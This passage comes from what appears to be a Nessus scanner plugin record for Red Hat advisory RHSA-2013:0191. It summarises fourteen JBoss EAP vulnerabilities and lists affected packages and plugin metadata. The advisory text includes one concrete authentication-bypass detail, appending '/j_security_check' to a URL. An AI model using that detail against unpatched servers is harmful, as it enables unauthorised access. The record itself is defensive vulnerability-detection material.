Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": null, "vector": null}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EAP (RHSA-2013:0191)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2014-05-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:hornetq-native", "p-cpe:/a:redhat:enterprise_linux:hsqldb", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas", "p-cpe:/a:redhat:enterprise_linux:jbossas-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq", "p-cpe:/a:redhat:enterprise_linux:jbossas-messaging", "p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:netty", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-helpers", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0191.NASL", "href": "https://www.tenable.com/plugins/nessus/64078", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# Disabled on 2013/06/06.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0191. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64078);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0191\");\n\n script_name(english:\"RHEL 6 : JBoss EAP (RHSA-2013:0191)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Application Platform 5.2.0 packages that fix\nmultiple security issues, various bugs, and add several enhancements\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Application Platform 5.1.2, and\nincludes bug fixes and enhancements. Refer to the JBoss Enterprise\nApplication Platform 5.2.0 Release Notes for information on the most\nsignificant of these changes. The Release Notes will be available\nshortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5066.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1096.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2487.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4575.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-0034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-0874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-2377.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-2379.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3369.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3370.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3546.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-5478.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/knowledge/docs/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2013-0191.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", 